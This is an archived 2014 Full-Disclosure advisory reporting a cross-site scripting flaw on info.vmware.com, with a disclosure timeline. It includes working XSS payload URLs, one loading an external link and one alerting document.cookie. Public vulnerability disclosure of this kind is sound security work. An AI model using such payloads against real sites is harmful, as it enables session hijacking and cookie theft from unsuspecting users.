| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 27 May 2014 20:06:17 +0200 From: "Roberto Garcia Amoriz" <roberto.garcia@...aramo.com> To: <fulldisclosure@...lists.org> Subject: [FD] XSS on Vmware Site Advisory: info.vmware.com Cross-Site Script Vulnerability (XSS) Advisory ID: VMware Support Request 14479234605 Author: Roberto Garcia Affected Software: Successfully tested on info.vmware.com Vendor URL: htt://info.vmware.com Vendor Status: informed ========================== Vulnerability Description ========================== The website "info.vmware.com" is prone to a XSS vulnerability. This vulnerability involves the ability to inject arbitrary and unauthorized javascript code. A malicious script inserted into a page in this manner can hijack the users session, submit unauthorized transactions as the user, steal confidential information, or simply deface the page. ========================== PoC-Exploit ========================== http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3Cimg%20src=% 22http://goo.gl/vxAvX3%22%3E http://info.vmware.com/content/26338_nsx_apj_cities?src=%22%3E%3CBODY%20ONLO AD=alert%28%22XSSby@...DeInfo%22%29%3E http://info.vmware.com/content/26338_nsx_apj_cities?src=%E2%80%9C%3E%3Cscrip t%3Ealert%28document.cookie%29%3C/script%3E PoC video is available at https://mega.co.nz/#F!78QXhLJJ!jtHAxJWjsJZlEE0gnSXeFw ========================== Solution ========================== None ========================== Disclosure Timeline ========================== - May 2014. I enrolled in an online course. They sent me an email confirmation to see more information. I found a XSS in the URL where vmware had the additional info. - Report vuln May 20, 2014 via email to desktop-services@...are.com - Asked by email to send a POC. I sent a video with the POC. - May 21, 2014. Asked by email to send the original email. - May 23, 2014. Replied by email that the original address (vmwareforum@...egate.com) does not belong to them, then vmware.com is not affected. I said them that the vuln was about info.vmware.com, it was not the email address. - Asked by email to go ahead and close this case on my behalf. - Closed as fixed, still vulnerable. ========================== Credits ========================== Vulnerability found and advisory written by Roberto Garcia Best regards. Roberto Garcia Amoriz Linkedin: Roberto Garcia Web: http://www.1gbdeinformacion.com _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists